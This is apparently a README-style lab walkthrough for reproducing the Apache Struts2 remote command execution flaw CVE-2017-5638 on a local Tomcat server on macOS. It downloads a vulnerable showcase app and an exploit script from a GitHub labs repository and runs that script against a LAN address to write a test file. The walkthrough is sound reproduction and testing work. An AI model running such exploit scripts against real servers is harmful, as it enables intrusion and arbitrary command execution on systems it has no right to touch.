test struts2 vulnerability CVE-2017-5638 in Mac OS X# test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X
test struts2 vulnerability CVE-2017-5638 in Mac OS X
###download test web app and run it in tomcat
```
#install tomcat
brew install tomcat
#confirm where the tomcat installed
ls -lF `which catalina`
#confirm tomcat home dir
ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec
#create web app "struts2" in webapps of tomcat home
mkdir /usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2
#get web app deployment file
wget https://github.com/nixawk/labs/raw/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war
#expand deployment file into the web app dir
brew install p7zip
7z x struts2_2.3.15.1-showcase.war -o/usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2
#confirm web app files
ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec/webapps/struts2
#run tomcat
catalina run
```
confirm the web app by visit http://localhost:8080/struts2
###from another machine, run exploit script to get ability to run any command
```
#get exploit tool script
wget https://github.com/nixawk/labs/raw/master/CVE-2017-5638/exploit-urllib2.py
#run exploit tool script
python exploit-urllib2.py http://192.168.11.5:8080/struts2/ "echo any command can be run > /tmp/yyy"
```
###go back to the web machine, check the file /tmp/yyy has been injected
```
cat /tmp/yyy
```
video: https://youtu.be/iQ_f-eG-EXg
登录后查看神龙缓存的 POC 文件快照
登录查看